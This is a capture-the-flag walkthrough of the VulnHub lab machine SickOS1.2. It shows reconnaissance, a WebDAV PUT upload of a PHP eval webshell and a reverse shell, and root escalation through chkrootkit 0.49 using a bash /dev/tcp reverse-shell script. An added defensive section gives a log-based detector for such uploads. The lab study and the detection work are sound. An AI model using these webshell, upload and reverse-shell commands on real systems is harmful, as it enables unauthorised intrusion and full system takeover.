[vulnhub] SickOS1.2


Information gathering

nmap

Host detection

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.56.0/24
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-19 11:28 EDT
Nmap scan report for 192.168.56.1
Host is up (0.00026s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.56.2
Host is up (0.00014s latency).
MAC Address: 00:50:56:EC:CE:9E (VMware)
Nmap scan report for 192.168.56.136
Host is up (0.00012s latency).
MAC Address: 00:0C:29:F7:DE:A9 (VMware)
Nmap scan report for 192.168.56.254
Host is up (0.00083s latency).
MAC Address: 00:50:56:E2:96:B0 (VMware)
Nmap scan report for 192.168.56.132
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.09 seconds

Port scan

┌──(kali㉿kali)-[~]
└─$ sudo nmap -p- --min-rate=10000 192.168.56.136
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-19 11:31 EDT
Nmap scan report for 192.168.56.136
Host is up (0.0012s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:F7:DE:A9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.49 seconds

Only ports 22 and 80 are open; the attack surface is rather small.

TCP Service OS

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p22,80 192.168.56.136
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-19 11:32 EDT
Nmap scan report for 192.168.56.136
Host is up (0.00093s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http lighttpd 1.4.28
MAC Address: 00:0C:29:F7:DE:A9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.75 seconds

Port 80 runs lighttpd 1.4.28; nothing else of note.

UDP

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU 192.168.56.136
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-19 11:35 EDT
Nmap scan report for 192.168.56.136
Host is up (0.00056s latency).
All 1000 scanned ports on 192.168.56.136 are in ignored states.
Not shown: 1000 open|filtered udp ports (no-response)
MAC Address: 00:0C:29:F7:DE:A9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 21.73 seconds

Moving on.

Vuln scan

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln 192.168.56.136
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-19 11:36 EDT
Nmap scan report for 192.168.56.136
Host is up (0.0017s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
| http-enum:
|_ /test/: Test page
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 00:0C:29:F7:DE:A9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 87.09 seconds

Only one possible DoS vulnerability; not much help.

vuln search

┌──(kali㉿kali)-[~]
└─$ searchsploit lighttpd 1.4
-------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------- ---------------------------------
lighttpd - Denial of Service (PoC) | linux/dos/18295.txt
Lighttpd 1.4.15 - Multiple Code Execution / Denial of Service / Information Disclosure Vulnerabilities | windows/remote/30322.rb
Lighttpd 1.4.16 - FastCGI Header Overflow Remote Command Execution | multiple/remote/4391.c
Lighttpd 1.4.17 - FastCGI Header Overflow Arbitrary Code Execution | linux/remote/4437.c
lighttpd 1.4.31 - Denial of Service (PoC) | linux/dos/22902.sh
Lighttpd 1.4.x - mod_userdir Information Disclosure | linux/remote/31396.txt
lighttpd 1.4/1.5 - Slow Request Handling Remote Denial of Service | linux/dos/33591.sh
Lighttpd < 1.4.23 (BSD/Solaris) - Source Code Disclosure | multiple/remote/8786.txt
-------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Nothing usable for lighttpd 1.4.28 in exploit-db either.

nikto

nmap didn't turn up much, so let's try nikto.

┌──(kali㉿kali)-[~]
└─$ sudo nikto -h 192.168.56.136
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.56.136
+ Target Hostname: 192.168.56.136
+ Target Port: 80
+ Start Time: 2023-04-19 11:40:45 (GMT-4)
---------------------------------------------------------------------------
+ Server: lighttpd/1.4.28
+ /: Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OPTIONS: Allowed HTTP Methods: OPTIONS, GET, HEAD, POST .
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /test/: Directory indexing found.
+ /test/: This might be interesting.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2023-04-19 11:41:11 (GMT-4) (26 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Only found a /test directory. Nothing else of note.

Web fingerprint

┌──(kali㉿kali)-[~]
└─$ whatweb 192.168.56.136
http://192.168.56.136 [200 OK] Country[RESERVED][ZZ], HTTPServer[lighttpd/1.4.28], IP[192.168.56.136], PHP[5.3.10-1ubuntu3.21], X-Powered-By[PHP/5.3.10-1ubuntu3.21], lighttpd[1.4.28]

The site's backend is written in PHP.

web

Let's open the page first and take a look.

Indeed. But there's no information there.

Let's look at /test.

The directory is empty; nothing at all.

Fine. Let's run a directory scan first to see whether there are other directories.

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.56.136 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.136
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/04/20 08:19:00 Starting gobuster in directory enumeration mode
===============================================================
/test (Status: 301) [Size: 0] [--> http://192.168.56.136/test/]
/%7Echeckout%7E (Status: 403) [Size: 345]
Progress: 220251 / 220561 (99.86%)
===============================================================
2023/04/20 08:19:59 Finished
===============================================================

Unbelievable, nothing at all. Just /test and the root /. (checkout has nothing either, don't bother.)

Let's find a way in through these two directories.

I searched Bing for other information-gathering methods and found an OWASP-based web security testing guide that mentions verifying all the HTTP methods a page supports. Besides the common POST and GET methods, if we can use PUT, we get arbitrary file upload. We can use the OPTIONS method in a request to see which HTTP methods a page supports.

With curl: curl -X OPTIONS <ip>; -X specifies the HTTP method.

┌──(kali㉿kali)-[~]
└─$ sudo curl -v -X OPTIONS 192.168.56.136
* Trying 192.168.56.136:80...
* Connected to 192.168.56.136 (192.168.56.136) port 80 (#0)
> OPTIONS / HTTP/1.1
> Host: 192.168.56.136
> User-Agent: curl/7.87.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< X-Powered-By: PHP/5.3.10-1ubuntu3.21
< Content-type: text/html
< Transfer-Encoding: chunked
< Date: Wed, 19 Apr 2023 16:43:58 GMT
< Server: lighttpd/1.4.28
<
<html>

<img src="blow.jpg">

</html>

<!-- NOTHING IN HERE ///\\\ -->>>>
* Connection #0 to host 192.168.56.136 left intact

We can see that the root directory doesn't support any other methods.

Let's check /test:

┌──(kali㉿kali)-[~]
└─$ sudo curl -v -X OPTIONS 192.168.56.136/test
* Trying 192.168.56.136:80...
* Connected to 192.168.56.136 (192.168.56.136) port 80 (#0)
> OPTIONS /test HTTP/1.1
> Host: 192.168.56.136
> User-Agent: curl/7.87.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Location: http://192.168.56.136/test/
< Content-Length: 0
< Date: Wed, 19 Apr 2023 16:50:42 GMT
< Server: lighttpd/1.4.28
<
* Connection #0 to host 192.168.56.136 left intact

We find that /test supports PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK and other methods, including the one we want most: PUT.

Exploitation

Let's upload something.

┌──(kali㉿kali)-[~/vulnhub/SickOS1.2/workSpace]
└─$ sudo curl 192.168.56.136/test -v --upload-file test.html
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 192.168.56.136:80...
* Connected to 192.168.56.136 (192.168.56.136) port 80 (#0)
> PUT /test HTTP/1.1
> Host: 192.168.56.136
> User-Agent: curl/7.87.0
> Accept: */*
> Content-Length: 38
> Expect: 100-continue
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 417 Expectation Failed
< Content-Type: text/html
< Content-Length: 363
< Connection: close
< Date: Wed, 19 Apr 2023 17:14:59 GMT
< Server: lighttpd/1.4.28
<
{ [363 bytes data]
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>417 - Expectation Failed</title>
</head>
<body>
<h1>417 - Expectation Failed</h1>
</body>
</html>
90 401 100 363 0 0 154k 0 --:--:-- --:--:-- --:--:-- 177k
* Closing connection 0

417? What's going on. Looking it up, it's a server-side Expectation issue. The default is Expect: 100-continue.

So we just set Expect to empty in the header.

┌──(kali㉿kali)-[~/vulnhub/SickOS1.2/workSpace]
└─$ sudo curl 192.168.56.136/test -T test.html -H "Expect:" -v
[sudo] password for kali:
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 192.168.56.136:80...
* Connected to 192.168.56.136 (192.168.56.136) port 80 (#0)
> PUT /test HTTP/1.1
> Host: 192.168.56.136
> User-Agent: curl/7.87.0
> Accept: */*
> Content-Length: 38
>
} [38 bytes data]
* We are completely uploaded and fine
* Mark bundle as not supporting multiuse
< HTTP/1.1 403 Forbidden
< Content-Type: text/html
< Content-Length: 345
< Date: Wed, 19 Apr 2023 17:42:29 GMT
< Server: lighttpd/1.4.28
<
{ [345 bytes data]
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>403 - Forbidden</title>
</head>
<body>
<h1>403 - Forbidden</h1>
</body>
</html>
100 383 100 345 100 38 126k 14323 --:--:-- --:--:-- --:--:-- 187k
* Connection #0 to host 192.168.56.136 left intact

403, didn't expect that. Where did it go wrong? Strange.

Let's test the PUT method.

┌──(kali㉿kali)-[~/vulnhub/SickOS1.2/workSpace]
└─$ sudo curl 192.168.56.136/test -X PUT -v
* Trying 192.168.56.136:80...
* Connected to 192.168.56.136 (192.168.56.136) port 80 (#0)
> PUT /test HTTP/1.1
> Host: 192.168.56.136
> User-Agent: curl/7.87.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 201 Created
< Content-Length: 0
< Date: Wed, 19 Apr 2023 17:43:48 GMT
< Server: lighttpd/1.4.28
<
* Connection #0 to host 192.168.56.136 left intact

Strange, 200, no problem at all.

Could it be that it's banned because the User-Agent header is curl?

┌──(kali㉿kali)-[~/vulnhub/SickOS1.2/workSpace]
└─$ sudo curl 192.168.56.136/test -T test.html -H "Expect:" -v -A "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 192.168.56.136:80...
* Connected to 192.168.56.136 (192.168.56.136) port 80 (#0)
> PUT /test HTTP/1.1
> Host: 192.168.56.136
> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
> Accept: */*
> Content-Length: 38
>
} [38 bytes data]
* We are completely uploaded and fine
* Mark bundle as not supporting multiuse
< HTTP/1.1 403 Forbidden
< Content-Type: text/html
< Content-Length: 345
< Date: Wed, 19 Apr 2023 17:46:44 GMT
< Server: lighttpd/1.4.28
<
{ [345 bytes data]
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>403 - Forbidden</title>
</head>
<body>
<h1>403 - Forbidden</h1>
</body>
</html>
100 383 100 345 100 38 136k 15403 --:--:-- --:--:-- --:--:-- 187k
* Connection #0 to host 192.168.56.136 left intact

Clearly not.

Never mind. Let's try uploading with -X PUT --data and see if it works.

┌──(kali㉿kali)-[~/vulnhub/SickOS1.2/workSpace]
└─$ sudo curl 192.168.56.136/test/test.html -v -X PUT --data "<script>alert('put is ok') </script>"
* Trying 192.168.56.136:80...
* Connected to 192.168.56.136 (192.168.56.136) port 80 (#0)
> PUT /test/test.html HTTP/1.1
> Host: 192.168.56.136
> User-Agent: curl/7.87.0
> Accept: */*
> Content-Length: 36
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 201 Created
< Content-Length: 0
< Date: Wed, 19 Apr 2023 18:03:45 GMT
< Server: lighttpd/1.4.28
<
* Connection #0 to host 192.168.56.136 left intact

It actually works. So let's upload a one-liner webshell and try connecting with AntSword.

<?php @eval($_POST["shell"]); ?>

Uploaded it, connected right away, easy, all good.

AntSword's shell feels odd to use.

And I'm still not quite willing to let go of why the earlier method wouldn't upload, so let's upload php-reverse-shell using the URL form from just now.

┌──(kali㉿kali)-[~/vulnhub/SickOS1.2/workSpace]
└─$ sudo curl 192.168.56.136/test/shell.php -T shell.php -H "Expect:" -v
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 192.168.56.136:80...
* Connected to 192.168.56.136 (192.168.56.136) port 80 (#0)
> PUT /test/shell.php HTTP/1.1
> Host: 192.168.56.136
> User-Agent: curl/7.87.0
> Accept: */*
> Content-Length: 5496
>
} [5496 bytes data]
* We are completely uploaded and fine
* Mark bundle as not supporting multiuse
< HTTP/1.1 201 Created
< Content-Length: 0
< Date: Wed, 19 Apr 2023 18:09:51 GMT
< Server: lighttpd/1.4.28
<
100 5496 0 0 100 5496 0 1888k --:--:-- --:--:-- --:--:-- 2683k
* Connection #0 to host 192.168.56.136 left intact

It actually uploaded successfully.

The php-reverse-shell we uploaded used port 4444, and we never received the reverse shell.

Let's try 443 instead.

This time I pinned down the upload failure: 192.168.56.136/test/ works, while 192.168.56.136/test fails.

┌──(kali㉿kali)-[~/vulnhub/SickOS1.2/workSpace]
└─$ sudo curl 192.168.56.136/test/ -T door.php -H "Expect:" -v
* Trying 192.168.56.136:80...
* Connected to 192.168.56.136 (192.168.56.136) port 80 (#0)
> PUT /test/door.php HTTP/1.1
> Host: 192.168.56.136
> User-Agent: curl/7.87.0
> Accept: */*
> Content-Length: 31
>
* We are completely uploaded and fine
* Mark bundle as not supporting multiuse
< HTTP/1.1 201 Created
< Content-Length: 0
< Date: Wed, 19 Apr 2023 18:23:03 GMT
< Server: lighttpd/1.4.28
<
* Connection #0 to host 192.168.56.136 left intact

Connected easily.

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvp 443
listening on [any] 443 ...
192.168.56.136: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.132] from (UNKNOWN) [192.168.56.136] 51687
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
11:40:47 up 3:13, 0 users, load average: 0.00, 0.02, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
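From the defender's side, the whole chain above leaves an obvious trail in lighttpd's access log: an OPTIONS on /test, a string of PUT requests, then a GET of the freshly created .php file. What follows is an added example, not part of the original post: a parser for Common Log Format lines (lighttpd's default access-log layout, with referer and user-agent appended) and detection logic that alerts on any state-changing method and escalates when a script that was just uploaded is fetched. The log lines are constructed to mirror the requests in this walkthrough; the field layout, severity labels and the extension list are my assumptions.

```python
import re

# CONSTRUCTED sample log, mirroring the requests seen in the walkthrough.
# Layout: client vhost user [time] "request" status bytes "referer" "user-agent"
SAMPLE_LOG = """\
192.168.56.132 192.168.56.136 - [19/Apr/2023:16:50:42 +0000] "OPTIONS /test HTTP/1.1" 301 0 "-" "curl/7.87.0"
192.168.56.132 192.168.56.136 - [19/Apr/2023:17:42:29 +0000] "PUT /test HTTP/1.1" 403 345 "-" "curl/7.87.0"
192.168.56.132 192.168.56.136 - [19/Apr/2023:18:03:45 +0000] "PUT /test/test.html HTTP/1.1" 201 0 "-" "curl/7.87.0"
192.168.56.132 192.168.56.136 - [19/Apr/2023:18:23:03 +0000] "PUT /test/door.php HTTP/1.1" 201 0 "-" "curl/7.87.0"
192.168.56.132 192.168.56.136 - [19/Apr/2023:18:23:10 +0000] "GET /test/door.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.56.1 192.168.56.136 - [19/Apr/2023:18:25:00 +0000] "GET /index.php HTTP/1.1" 200 85 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) (?P<vhost>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<bytes>\S+)'
)

# Methods that create, change or remove server-side content.
WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "MOVE", "COPY", "PROPPATCH"}
# Extensions the server would hand to PHP (assumed list, extend for your setup).
EXECUTABLE_EXT = (".php", ".phtml", ".php5")


def parse_line(line: str):
    """Return the named fields of one access-log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def detect_webdav_writes(log_text: str) -> list:
    """Walk the log once. Every write method yields an alert (low if the server
    rejected it, high if it succeeded); a GET of a path that an earlier
    successful PUT created, with a server-executable extension, is critical."""
    alerts = []
    created = set()
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        status = int(rec["status"])
        ok = 200 <= status < 300
        method, target, client = rec["method"], rec["target"], rec["client"]
        if method in WRITE_METHODS:
            alerts.append({
                "severity": "high" if ok else "low",
                "client": client, "method": method, "target": target,
                "msg": f"{method} {target} {'succeeded' if ok else f'rejected ({status})'}",
            })
            if ok and method == "PUT":
                created.add(target)
        elif method == "GET" and target in created and target.lower().endswith(EXECUTABLE_EXT):
            alerts.append({
                "severity": "critical",
                "client": client, "method": method, "target": target,
                "msg": f"uploaded script {target} was executed by {client}",
            })
    return alerts


if __name__ == "__main__":
    for a in detect_webdav_writes(SAMPLE_LOG):
        print(f"[{a['severity']:8}] {a['client']:15} {a['msg']}")
```

The rejected `PUT /test` still produces a low-severity alert on purpose: a burst of refused write attempts from one client is exactly the reconnaissance pattern that precedes a successful upload, and it is cheap to surface before the 201 arrives.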

Privilege escalation

  1. sudo -l needs a password. Dead end.
  2. Look at SUID programs
    www-data@ubuntu:/$ find / -type f -perm -04000 -ls 2>/dev/null
    find / -type f -perm -04000 -ls 2>/dev/null
    667707 268 -rwsr-xr-- 1 root dip 273272 Feb 4 2011 /usr/sbin/pppd
    667843 20 -rwsr-sr-x 1 libuuid libuuid 17976 Mar 29 2012 /usr/sbin/uuidd
    786948 8 -rwsr-xr-x 1 root root 5564 Dec 13 2011 /usr/lib/eject/dmcrypt-get-device
    1055122 244 -rwsr-xr-x 1 root root 248056 Jan 13 2016 /usr/lib/openssh/ssh-keysign
    668412 12 -rwsr-xr-x 1 root root 9728 Feb 16 2016 /usr/lib/pt_chown
    668120 12 -r-sr-xr-x 1 root root 9532 Mar 30 2016 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
    668337 16 -r-sr-xr-x 1 root root 14320 Mar 30 2016 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
    1182917 312 -rwsr-xr-- 1 root messagebus 316824 Jun 13 2013 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    660925 72 -rwsr-xr-x 2 root root 69708 Feb 27 2013 /usr/bin/sudoedit
    667308 16 -rwsr-xr-x 1 root root 14012 Nov 8 2011 /usr/bin/traceroute6.iputils
    660925 72 -rwsr-xr-x 2 root root 69708 Feb 27 2013 /usr/bin/sudo
    659044 32 -rwsr-xr-x 1 root root 31748 Sep 12 2012 /usr/bin/chsh
    659043 44 -rwsr-xr-x 1 root root 41284 Sep 12 2012 /usr/bin/passwd
    659041 40 -rwsr-xr-x 1 root root 40292 Sep 12 2012 /usr/bin/chfn
    667072 44 -rwsr-sr-x 1 daemon daemon 42800 Oct 25 2011 /usr/bin/at
    667649 56 -rwsr-xr-x 1 root root 56208 Jul 28 2011 /usr/bin/mtr
    659047 60 -rwsr-xr-x 1 root root 57956 Sep 12 2012 /usr/bin/gpasswd
    658916 32 -rwsr-xr-x 1 root root 30896 Sep 12 2012 /usr/bin/newgrp
    1179695 88 -rwsr-xr-x 1 root root 88760 Mar 29 2012 /bin/mount
    1179715 40 -rwsr-xr-x 1 root root 39116 Nov 8 2011 /bin/ping6
    1182983 28 -rwsr-xr-x 1 root root 26252 Mar 2 2012 /bin/fusermount
    1179696 68 -rwsr-xr-x 1 root root 67720 Mar 29 2012 /bin/umount
    1179714 36 -rwsr-xr-x 1 root root 34740 Nov 8 2011 /bin/ping
    1179689 32 -rwsr-xr-x 1 root root 31116 Sep 12 2012 /bin/su

No permission for at, and reading files via mtr still doesn't work. No luck.

  1. Look at crontab.
    A standard crontab; nothing usable at a glance.
  2. Upload linpeas. Run it and note anything that looks interesting.
    ══╣ Some home ssh config file was found
    /usr/share/doc/openssh-client/examples/sshd_config
    AuthorizedKeysFile .ssh/authorized_keys
    Subsystem sftp /usr/libexec/sftp-server


    ╔══════════╣ Analyzing Interesting logs Files (limit 70)

    -rw-r--r-- 1 www-data www-data 6927 Apr 19 20:02 /var/log/lighttpd/error.log

    ╔══════════╣ Analyzing Other Interesting Files (limit 70)
    -rw-r--r-- 1 root root 3486 Mar 28 2013 /etc/skel/.bashrc
    -rw-r--r-- 1 john john 3486 Mar 30 2016 /home/john/.bashrc

    -rw-r--r-- 1 root root 675 Mar 28 2013 /etc/skel/.profile
    -rw-r--r-- 1 john john 675 Mar 30 2016 /home/john/.profile


    ╔══════════╣ Cron jobs
    ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
    /usr/bin/crontab
    incrontab Not Found
    -rw-r--r-- 1 root root 722 Jun 19 2012 /etc/crontab

    /etc/cron.daily:
    total 72
    drwxr-xr-x 2 root root 4096 Apr 12 2016 .
    drwxr-xr-x 84 root root 4096 Apr 19 20:39 ..
    -rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
    -rwxr-xr-x 1 root root 15399 Nov 15 2013 apt
    -rwxr-xr-x 1 root root 314 Apr 18 2013 aptitude
    -rwxr-xr-x 1 root root 502 Mar 31 2012 bsdmainutils
    -rwxr-xr-x 1 root root 2032 Jun 4 2014 chkrootkit
    -rwxr-xr-x 1 root root 256 Oct 14 2013 dpkg
    -rwxr-xr-x 1 root root 338 Dec 20 2011 lighttpd
    -rwxr-xr-x 1 root root 372 Oct 4 2011 logrotate
    -rwxr-xr-x 1 root root 1365 Dec 28 2012 man-db
    -rwxr-xr-x 1 root root 606 Aug 17 2011 mlocate
    -rwxr-xr-x 1 root root 249 Sep 12 2012 passwd
    -rwxr-xr-x 1 root root 2417 Jul 1 2011 popularity-contest
    -rwxr-xr-x 1 root root 2947 Jun 19 2012 standard

    /etc/cron.hourly:
    total 12
    drwxr-xr-x 2 root root 4096 Mar 30 2016 .
    drwxr-xr-x 84 root root 4096 Apr 19 20:39 ..
    -rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder

    /etc/cron.monthly:
    total 12
    drwxr-xr-x 2 root root 4096 Mar 30 2016 .
    drwxr-xr-x 84 root root 4096 Apr 19 20:39 ..
    -rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder

    /etc/cron.weekly:
    total 20
    drwxr-xr-x 2 root root 4096 Mar 30 2016 .
    drwxr-xr-x 84 root root 4096 Apr 19 20:39 ..
    -rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
    -rwxr-xr-x 1 root root 730 Sep 13 2013 apt-xapian-index
    -rwxr-xr-x 1 root root 907 Dec 28 2012 man-db

    SHELL=/bin/sh
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

    17 * * * * root cd / && run-parts --report /etc/cron.hourly
    25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
    47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
    52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

Checking each item in turn, only /etc/cron.daily looks promising, because it holds many executables and they run every day; let's see whether any of them is usable.
I looked at each one; they're all scripts and I couldn't tell what they do, so let's just search each name + exp for exploitable vulnerabilities.

  1. Found that chkrootkit has a privilege escalation vulnerability. First let's check its version: chkrootkit -V gives 0.49, exactly the vulnerable version.
  2. Search for an exploit:
    ┌──(kali㉿kali)-[~/vulnhub/SickOS1.2/workSpace]
    └─$ searchsploit chkrootkit 0.4
    -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
    Exploit Title | Path
    -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
    Chkrootkit - Local Privilege Escalation (Metasploit) | linux/local/38775.rb
    Chkrootkit 0.49 - Local Privilege Escalation | linux/local/33899.txt
    -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
    Shellcodes: No Results

Download it and take a look.

  1. Before getting started, let's switch shells: 4444 was clearly blocked earlier, which means there's firewall filtering. So let's try a port like 8080, and sure enough it works.
  2. Let's go
    $ cat << EOF > update
    > #!/bin/bash
    > bash -i >& /dev/tcp/192.168.56.132/443 0>&1
    > EOF
    $ ls
    VMwareDnD
    php.socket-0
    update
    vgauthsvclog.txt.0
    vmware-root
    $ cat update
    #!/bin/bash
    bash -i >& /dev/tcp/192.168.56.132/443 0>&1

Written, but after waiting ages nothing happened. Did something go wrong? Or, since it's called cron.daily, am I unlucky enough to have to wait a day???

  1. Getting impatient, I tried to run it directly. Running ./chkrootkit directly gave no response at all. No sudo rights either. Running update directly does get me a shell. I searched online for how to run a scheduled task and found nothing, then suddenly remembered that the cron jobs are run via run-parts. Tried it; running it inside the folder errored out, so I looked up run-parts. It runs all the executable files at the first level of the specified directory.
  2. Try run-parts /etc/cron.daily
    OK, got it.
    ┌──(kali㉿kali)-[~]
    └─$ sudo nc -lvp 443
    [sudo] password for kali:
    listening on [any] 443 ...
    192.168.56.136: inverse host lookup failed: Host name lookup failure
    connect to [192.168.56.132] from (UNKNOWN) [192.168.56.136] 57899
